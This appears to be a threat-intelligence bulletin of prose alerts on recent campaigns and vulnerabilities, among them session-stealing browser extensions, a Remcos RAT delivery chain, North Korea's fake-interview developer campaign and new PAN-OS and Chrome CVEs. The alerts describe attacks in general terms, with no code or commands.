Threat Alerts

A coordinated campaign involving multiple malicious browser extensions was identified targeting enterprise HR and ERP environments, enabling long-term account compromise through session hijacking and interference with security controls. The activity poses a high organizational risk, as it allows unauthorized access to sensitive workforce, payroll, and financial systems while actively preventing standard containment actions. The combined effect is persistent access that can survive password resets, session invalidation, and routine incident response workflows, significantly increasing the impact window of a single compromised endpoint.

The extensions present themselves as legitimate productivity or access-management tools, requesting permissions that appear consistent with enterprise platform usage. Once installed, they initiate a chained infection flow that begins with continuous extraction of authentication session cookies from targeted platforms. These tokens are periodically exfiltrated to external infrastructure and monitored for changes, ensuring refreshed access whenever users reauthenticate. Some variants further manipulate browser request handling to silently reinject stolen session data into outbound traffic, while others support direct cookie injection, allowing attackers to assume authenticated sessions without credentials or multi-factor challenges.

In parallel, complementary components interfere with security visibility and response by blocking access to administrative and identity-management interfaces within the affected platforms. This is achieved through DOM manipulation and aggressive page monitoring that removes content and forces navigation errors whenever sensitive security pages are accessed, including password management, account disabling, authentication history, and audit functions. Anti-analysis techniques are embedded to obstruct inspection and conceal malicious behavior. Taken together, these capabilities indicate a deliberately segmented but unified operation designed to maintain control, limit detection, and prevent remediation, reflecting a mature approach to enterprise session abuse rather than opportunistic credential theft.

A new Windows-based malware campaign tracked as SHADOW#REACTOR was uncovered delivering the Remcos remote access Trojan (RAT) through a layered and evasive execution chain designed to minimize on-disk artifacts. The activity relies on scripted loaders and text-based payload retrieval, ultimately executing the final malware directly in memory. This approach reduces visibility for traditional signature-based controls and enables sustained access without deploying a conventional executable.

The attack chain begins with a malicious script, likely delivered via phishing or social engineering, which launches an obfuscated PowerShell process. Rather than downloading a single payload, the script retrieves multiple text files from attacker-controlled infrastructure, reconstructing the malicious components at runtime. These components are then loaded into memory, with protection mechanisms applied to hinder analysis and reverse engineering. Native Windows tooling is leveraged during execution, blending malicious activity with legitimate system behavior.

This campaign reflects a continued shift toward low-noise, fileless delivery techniques commonly associated with commodity RAT deployment. While no specific threat actor has been publicly attributed, the tooling and delivery methods align with financially motivated operations seeking persistent remote access for follow-on activity such as credential theft, data collection, or resale of access. The use of trusted system utilities and text-based staging highlights ongoing challenges for defenders in detecting early-stage intrusion activity.

A high-severity denial-of-service vulnerability has been identified in Palo Alto Networks firewall products, specifically affecting the GlobalProtect VPN and secure remote-access platform used to protect enterprise networks. Tracked as CVE-2026-0227 (CVSS 7.7), the flaw allows unauthenticated attackers to remotely disrupt firewall operations, potentially forcing affected devices into maintenance mode through repeated exploitation. With thousands of exposed firewalls reachable online, the vulnerability poses a serious risk to organizations that depend on these systems for perimeter defense and secure remote access.

The issue is caused by an improper check for exceptional conditions in the GlobalProtect component running on next-generation firewalls with PAN-OS 10.1 and later. When the GlobalProtect gateway or portal is enabled, attackers can exploit the flaw without authentication, bypassing security controls and triggering firewall instability. The vulnerability impacts both on-premises and cloud-based deployments, although most cloud instances have already been patched. While no active exploitation has been confirmed, the combination of unauthenticated access, service-disrupting impact and a large exposed attack surface underscores the need for immediate remediation to prevent firewall outages and potential follow-on attacks during periods of degraded protection.

North Korean threat actors have launched the “Contagious Interview” campaign, targeting software developers through fake recruitment offers on platforms like Upwork and LinkedIn. This sophisticated social engineering operation uses malicious code repositories disguised as technical assessments to deploy dual-layer malware systems that steal credentials, cryptocurrency wallets, and establish persistent remote access on victim systems.

The attack employs three primary infection vectors to ensure successful compromise. The most dangerous method uses a hidden VS Code tasks configuration that automatically executes when developers open project folders, requiring no direct code execution. A second vector embeds application logic hooks in server code where legitimate-looking functions trigger payload downloads. If both fail, the malware attempts to install malicious npm dependencies. Once triggered, the malware downloads a Node.js controller that operates entirely in memory, deploying five specialized modules including keyloggers, screenshot tools, file grabbers, clipboard monitors, and browser stealers targeting Chrome, Brave, and Opera databases.

Following initial infection, Python payloads establish stronger persistence through startup folder injections and scheduled tasks mimicking legitimate Windows processes like RuntimeBroker.exe. The malware creates hidden directories in system folders and deploys XMRig cryptocurrency mining software disguised as msedge.exe. The campaign infrastructure spans multiple Vercel-hosted distribution domains and dedicated command-and-control servers running on Windows Server 2019/2022 with Express.js. Analysis reveals 64 layers of obfuscation protecting the final payload, along with 1,000 Pastebin accounts for dead drop resolution. The operators demonstrate sophisticated operational security with real-time monitoring capabilities and strict credential compartmentalization across their infrastructure.

A rising trend in phishing activity is targeting Facebook users through the increasingly sophisticated Browser-in-the-Browser technique, as reported by Trellix, where attackers embed a fake but highly convincing login pop-up directly inside an active browser tab rather than redirecting victims to a suspicious website. These forged windows replicate legitimate branding, lock icons and URL displays while silently harvesting credentials, making traditional advice such as checking the address bar ineffective. To further evade detection, attackers host phishing pages on trusted cloud platforms and use layered redirects and URL shorteners, often delivering lures framed as urgent account violations, copyright complaints or security alerts. This shift highlights a broader evolution in phishing tactics that blends advanced front-end deception with reputable infrastructure, reducing visual indicators of fraud and increasing the likelihood of successful credential compromise.

Google has patched three high-severity vulnerabilities affecting core Chrome browser components, including the V8 JavaScript engine and the Blink rendering engine. The most critical flaw, CVE-2026-0899, is an out-of-bounds memory access vulnerability in V8, rated High (CVSS 9.8), which could allow remote arbitrary code execution in the context of the logged-on user if a victim is lured to a malicious or compromised webpage. Successful exploitation could enable attackers to execute attacker-controlled code, manipulate data, or establish an initial foothold within the affected environment.

Two additional high-severity vulnerabilities, CVE-2026-0900 and CVE-2026-0901 (both CVSS 9.8), stem from implementation weaknesses in Chrome’s JavaScript execution and rendering components and could be abused to bypass expected execution boundaries and achieve similar code-execution outcomes. While no in-the-wild exploitation has been reported, browser engine vulnerabilities remain a preferred target for both financially motivated and state-aligned threat actors due to their constant exposure to untrusted web content. Given Chrome’s widespread use across enterprise environments, successful exploitation could provide a highly scalable initial access vector, particularly where browsers are used to access internal applications and cloud services.